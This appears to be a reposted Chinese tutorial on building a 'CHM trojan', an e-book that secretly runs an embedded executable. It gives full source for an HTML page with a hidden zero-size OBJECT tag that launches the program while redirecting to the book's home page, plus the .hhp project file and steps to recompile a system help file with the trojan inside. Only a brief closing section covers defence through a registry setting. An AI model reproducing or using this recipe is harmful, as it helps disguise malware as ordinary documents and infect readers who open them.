Step1:要想制作一個完美的CHM木馬,當然少不了電子書的制作工具。在這裡我們選擇微軟自家的Microsoft HTML Help Workshop,漢化版本可以在http://www.sixvee.com/520yy/tools/cytkk-2.rar下載。
當然了,作為木馬程序的載體,一本CHM電子書是少不了的。本文演示所采用的是系統幫助文件中現成的windows.chm。
Step2:首先運行windows.chm,在右側的空白處點擊右鍵菜單,進入“屬性”頁。記錄下該電子文檔的默認主頁default.htm和標題欄文字Windows 2000兩項信息。
Step3:接下來需要制作一個可以讓木馬運行並且同時可以自動跳轉到windows.chm默認主頁的網頁,例如cytkk.htm,源代碼如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='default.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="灰色按鈕克星.exe">
</OBJECT>
</BODY>
</HTML>
代碼注釋:
content="3是轉向時間(單位為秒),可以根據木馬程序的運行時間自行修改,建議不要超過5秒。TW.WINgWIT.CoM其中的default.htm可以改為你用的電子書的默認主頁名,灰色按鈕克星.exe為木馬程序名,你可以根據情況更改。
Step4:運行HTML Help Workshop,選擇文件菜單下的反編譯項。接下來在反編譯後的目錄中可以看到windows.hhc(對應幫助文檔左側的“目錄”項)和windows.hhk(對應幫助文檔左側的“索引”項)。
Step5:現在要做的就是把木馬程序復制到反編譯後的目錄中(本文中以插入灰色按鈕克星.exe這款小軟件為例),並在此目錄下建立一個例如文件名為cytkk.hhp的文件(用記事本即可),代碼如下:
[OPTIONS]
Compatibility=1.1 Or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中國)
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm
灰色按鈕克星.exe
代碼注釋:
windows.chm可以改為你要生成的電子書名,而灰色按鈕克星.exe則把它改為要嵌入的木馬程序名,Main=後面改為在第一步時你得到的標題欄文字,windows.hhc及windows.hhk分別改為第三步得到的文件名。
最後用HTML Help Workshop打開cytkk.hhp,點擊“文件”→“編譯”,待提示完成後,就可以在目標目錄中發現已經編譯好的帶有木馬的電子書windows.chm了。
高手傳經:防之有道
我們不可能對下載的每本書都進行反編譯工作來加以檢查,那是會累死人的。筆者建議大家在下載電子書籍時,盡量去知名網站下載。
另外讀者朋友們也可以修改本地安全屬性,使CHM木馬無法在本地運行木馬程序,將注冊表“HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0”下的1004項的值由原來十進制的0改為十六進制的3。
From:http://tw.wingwit.com/Article/Network/201309/1043.html